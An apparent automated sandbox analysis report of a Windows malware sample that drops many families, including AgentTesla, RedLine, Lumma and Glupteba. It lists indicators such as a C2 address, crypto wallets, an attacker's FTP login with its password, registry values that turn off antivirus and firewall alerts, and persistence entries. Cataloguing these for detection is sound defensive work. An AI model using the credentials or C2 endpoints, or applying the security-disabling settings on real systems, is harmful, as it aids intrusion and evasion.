agenttesla | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

09-04-2024 08:32

09-04-2024 08:32

11-03-2024 08:03

10-03-2024 15:15

Analysis

max time kernel
54s
max time network
475s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
09-04-2024 08:32

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

phorphiex

http://185.215.113.66/

Wallets

0xAa3ea4838e8E3F6a1922c6B67E3cD6efD1ff175b

THRUoPK7oYqF7YyKZJvPYwTH35JsPZVPto

1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6

qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut

XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL

LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX

rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH

ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ

48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg

3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC

3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3

D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH

t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn

bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd

bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg

bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut

GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.siscop.com.co
Port:
21
Username:
[email protected]
Password:
+5s48Ia2&-(t

Extracted

Family

redline

Botnet

siski

168.119.242.255:7742

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Lumma Stealer payload V2 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe	family_lumma_V2

Detect Lumma Stealer payload V4 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe	family_lumma_v4

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe	family_xworm

Detect ZGRat V1 32 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe	family_zgrat_v1
behavioral4/memory/2032-95-0x00000000000D0000-0x00000000002C2000-memory.dmp	family_zgrat_v1
C:\PortproviderwinMonitorSvc\ContainerserverFontSavessession.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\alex12341.exe	family_zgrat_v1
behavioral4/memory/2796-471-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe	family_zgrat_v1
behavioral4/memory/5748-641-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-642-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-646-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-652-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-661-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-666-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-668-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-670-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-674-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-677-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-682-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-692-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-695-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-699-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-704-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-710-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-716-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-727-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
behavioral4/memory/5748-731-0x0000000005D00000-0x00000000061AB000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\install.exe	family_zgrat_v1
C:\Users\Admin\Documents\SimpleAdobe\_bqJnycQc0XlOCzgx2h0T0yk.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\afile.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\cry.exe	family_zgrat_v1
C:\Users\Admin\AppData\Roaming\configurationValue\traffic.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\alex12.exe	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 7 IoCs

Processes:

resource	yara_rule
behavioral4/memory/448-224-0x0000000004560000-0x0000000004E4B000-memory.dmp	family_glupteba
behavioral4/memory/448-231-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral4/memory/448-262-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral4/memory/448-298-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral4/memory/2804-372-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral4/memory/2804-539-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral4/memory/2804-616-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

AppGate2103v01.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	AppGate2103v01.exe

Phorphiex
Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1488	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1388	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5020	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5024	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4752	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3452	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3360	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4620	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5012	252	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4240	252	schtasks.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\ghhjhjhsg.exe	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 10 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\TWO.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\s1.exe	family_redline
behavioral4/memory/1548-733-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\redlinepanel.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\mk.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\new1.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\traffic.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\newss.exe	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe	family_sectoprat
C:\Users\Admin\AppData\Local\Temp\Files\s1.exe	family_sectoprat

Windows security bypass 2 TTPs 24 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

twztl.exe216382182.exe1981120061.exe2565728307.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	2565728307.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

AppGate2103v01.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AppGate2103v01.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

1716 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	AppGate2103v01.exe

pid	process
1716	netsh.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AppGate2103v01.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	AppGate2103v01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	AppGate2103v01.exe

Executes dropped EXE 17 IoCs

Processes:

npp.exe1981120061.exeAppGate2103v01.exeDCRatBuild.exetwztl.exeLoaderAVX.exeContainerserverFontSavessession.exe216382182.exe2657517237.exe2565728307.exedllhost.exee0cbefcb1af40c7d4aff4aca26621a98.exe29087837.exe328410286.exe393631562.exe180932213.exe56319815.exe

pid	process
1008	npp.exe
2564	1981120061.exe
2736	AppGate2103v01.exe
3504	DCRatBuild.exe
2520	twztl.exe
4780	LoaderAVX.exe
2032	ContainerserverFontSavessession.exe
3240	216382182.exe
4756	2657517237.exe
4180	2565728307.exe
3680	dllhost.exe
448	e0cbefcb1af40c7d4aff4aca26621a98.exe
580	29087837.exe
3000	328410286.exe
3176	393631562.exe
4784	180932213.exe
740	56319815.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\AppGate2103v01.exe	themida
behavioral4/memory/2736-28-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida
behavioral4/memory/2736-32-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida
behavioral4/memory/2736-34-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida
behavioral4/memory/2736-36-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida
behavioral4/memory/2736-39-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida
behavioral4/memory/2736-40-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida
behavioral4/memory/2736-41-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida
behavioral4/memory/2736-42-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida
behavioral4/memory/2736-96-0x00007FF7B9DD0000-0x00007FF7BA640000-memory.dmp	themida

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\adm_atu.exe	upx

Windows security modification 2 TTPs 28 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

twztl.exe216382182.exe1981120061.exe2565728307.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	2565728307.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	1981120061.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	216382182.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	2565728307.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

2565728307.exe1981120061.exetwztl.exe216382182.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Users\\Admin\\winakrosvsa.exe"	2565728307.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysdinrdvs.exe"	1981120061.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysdinrdvs.exe"	1981120061.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winpsdrvnas.exe"	twztl.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\winpsdrvnas.exe"	twztl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspplsvc.exe"	216382182.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\syspplsvc.exe"	216382182.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winakrosvsa.exe"	2565728307.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

AppGate2103v01.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AppGate2103v01.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	AppGate2103v01.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

Processes:

flow	ioc
94	raw.githubusercontent.com
221	bitbucket.org
336	pastebin.com
743	pastebin.com
875	drive.google.com
64	raw.githubusercontent.com
235	bitbucket.org
569	bitbucket.org
573	bitbucket.org
229	bitbucket.org
253	bitbucket.org
676	pastebin.com
903	drive.google.com
260	pastebin.com
708	raw.githubusercontent.com

Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 api.myip.com
15 ipinfo.io
1 ipinfo.io
4 ip-api.com
11 api.myip.com

flow	ioc
12	api.myip.com
15	ipinfo.io
1	ipinfo.io
4	ip-api.com
11	api.myip.com

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\medcallaboratory5.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\Files\well.exe	autoit_exe

Drops file in System32 directory 4 IoCs

Processes:

AppGate2103v01.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	AppGate2103v01.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	AppGate2103v01.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	AppGate2103v01.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	AppGate2103v01.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

AppGate2103v01.exe

pid process

2736 AppGate2103v01.exe

pid	process
2736	AppGate2103v01.exe

Drops file in Program Files directory 2 IoCs

Processes:

ContainerserverFontSavessession.exe

description	ioc	process
File created	C:\Program Files (x86)\Internet Explorer\c4a1621ddb0d41	ContainerserverFontSavessession.exe
File created	C:\Program Files (x86)\Internet Explorer\twztl.exe	ContainerserverFontSavessession.exe

Drops file in Windows directory 9 IoCs

Processes:

1981120061.exetwztl.exeContainerserverFontSavessession.exe216382182.exe2565728307.exe

description	ioc	process
File opened for modification	C:\Windows\sysdinrdvs.exe	1981120061.exe
File created	C:\Windows\winpsdrvnas.exe	twztl.exe
File created	C:\Windows\servicing\FodMetadata\metadata\1981120061.exe	ContainerserverFontSavessession.exe
File opened for modification	C:\Windows\syspplsvc.exe	216382182.exe
File created	C:\Windows\sysdinrdvs.exe	1981120061.exe
File opened for modification	C:\Windows\winpsdrvnas.exe	twztl.exe
File created	C:\Windows\syspplsvc.exe	216382182.exe
File created	C:\Windows\winakrosvsa.exe	2565728307.exe
File opened for modification	C:\Windows\winakrosvsa.exe	2565728307.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

5992 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
5992	sc.exe

Program crash 15 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3060	1548	WerFault.exe	RegAsm.exe
4720	5792	WerFault.exe	kb^fr_ouverture.exe
5456	2056	WerFault.exe	23.exe
8136	5928	WerFault.exe	PsspCrsiHRBkDREZBXjDe7Uu.exe
8112	5928	WerFault.exe	PsspCrsiHRBkDREZBXjDe7Uu.exe
6308	7804	WerFault.exe	ISetup5.exe
4280	7804	WerFault.exe	ISetup5.exe
7440	4052	WerFault.exe	Adobe_update.exe
4500	4612	WerFault.exe	P9DZii693CusXaiX1fmdKApG.exe
2928	6792	WerFault.exe	u4ko.0.exe
3052	5952	WerFault.exe	u60s.0.exe
1700	7608	WerFault.exe	syncUpd.exe
7912	8140	WerFault.exe	u5l0.0.exe
2376	5840	WerFault.exe	RegAsm.exe
8948	7236	WerFault.exe	TNhJ8lgmVn58Ewrm6NdQlWIe.exe

Creates scheduled task(s) 1 TTPs 25 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2708	schtasks.exe
1388	schtasks.exe
7916	schtasks.exe
6236	schtasks.exe
3452	schtasks.exe
3360	schtasks.exe
412	schtasks.exe
2384	schtasks.exe
4752	schtasks.exe
6016	schtasks.exe
2256	schtasks.exe
3012	schtasks.exe
5024	schtasks.exe
5628	schtasks.exe
5020	schtasks.exe
5904	schtasks.exe
4240	schtasks.exe
4812	schtasks.exe
4620	schtasks.exe
5012	schtasks.exe
1860	schtasks.exe
4052	schtasks.exe
1488	schtasks.exe
4596	schtasks.exe
1644	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

2032 timeout.exe
7208 timeout.exe

pid	process
2032	timeout.exe
7208	timeout.exe

Modifies registry class 2 IoCs

Processes:

DCRatBuild.exeContainerserverFontSavessession.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000_Classes\Local Settings	DCRatBuild.exe
